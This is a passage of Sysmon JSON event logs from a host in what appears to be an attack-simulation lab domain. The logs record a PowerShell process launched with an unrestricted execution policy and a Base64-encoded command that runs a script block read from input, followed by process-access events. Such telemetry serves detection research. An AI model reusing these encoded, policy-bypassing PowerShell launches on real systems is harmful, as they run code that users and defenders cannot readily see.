JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.887","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","ParentProcessId":"1576","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nSourceProcessId: 1576\r\nSourceThreadId: 5064\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7e50ac6b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9abd45|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9aba16|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7e45ce2b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d96c5ac|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9caa7b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ae0e0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ae0e0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9adf71|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d99fef6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ac429|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ac01c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9abd45|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9aba16|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7e45ce2b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d992877|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d991e47","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","SourceProcessId":"1576","SourceThreadId":"5064","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7e50ac6b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9abd45|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9aba16|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7e45ce2b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d96c5ac|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9caa7b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ae0e0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ae0e0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9adf71|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d99fef6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ac429|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9ac01c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9abd45|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d9aba16|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7e45ce2b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d992877|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+7d991e47","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 